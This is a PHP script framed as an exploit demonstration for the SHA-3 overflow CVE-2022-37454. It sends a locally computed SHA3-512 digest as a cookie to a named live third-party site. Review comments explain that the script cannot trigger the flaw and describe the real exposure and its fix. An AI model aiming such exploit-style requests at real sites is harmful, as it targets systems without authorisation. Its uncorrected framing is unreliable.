<?php
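// CVE-2022-37454 illustration: SHA-3 (Keccak XKCP) integer overflow reachable through PHP's hash extension.
// Based on https://www.rapid7.com/db/vulnerabilities/php-cve-2022-37454/
//
// NOTE(review): as written, this script does not exercise the vulnerability.
// The flaw sits in the SHA-3 sponge (absorb) code of the process that *computes* the hash,
// so it is only reachable where attacker-influenced data is passed to hash()/hash_update()
// with a SHA-3 algorithm. Here the digest is computed locally over a short constant string and
// only the resulting fixed-length hex digest leaves the machine; the receiving server does not
// hash anything as a consequence of this request, so no overflow is triggered on it.
//
// Defender's view: the exposure is any code path that hashes untrusted, unbounded input with
// sha3-*. Mitigation is running a PHP build that contains the upstream fix (see the advisory
// linked above) and capping the size of untrusted input before it reaches the hash functions.

// URL the request is sent to.
$url = "https://fastfounder.ru/na-kazhdom-zarabotat/";

// Short constant input for the local hash; it is data to be hashed, not executable content.
$payload = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";

// Incremental SHA3-512 over the payload, computed in this process.
$hash = hash_init("sha3-512");
hash_update($hash, $payload);

// hash_final() returns the digest as lowercase hex (128 characters for SHA3-512).
$hash_value = hash_final($hash);

// The original never created the cURL handle, so every curl_* call below operated on an
// undefined $ch and the request could not be sent. Create it and fail loudly if that is not possible.
$ch = curl_init();
if ($ch === false) {
    error_log("curl_init() failed");
    exit(1);
}

curl_setopt($ch, CURLOPT_URL, $url);
// Return the response body from curl_exec() instead of writing it straight to output.
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// The digest travels as an ordinary cookie value; to the server it is just a 128-character string.
curl_setopt($ch, CURLOPT_COOKIE, "hash=$hash_value"); // or use CURLOPT_POSTFIELDS for parameters

$output = curl_exec($ch);
if ($output === false) {
    // Surface transport errors rather than silently echoing an empty string.
    $error = curl_error($ch);
    curl_close($ch);
    error_log("Request failed: $error");
    exit(1);
}
curl_close($ch);

// Print the response body.
echo $output;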
?>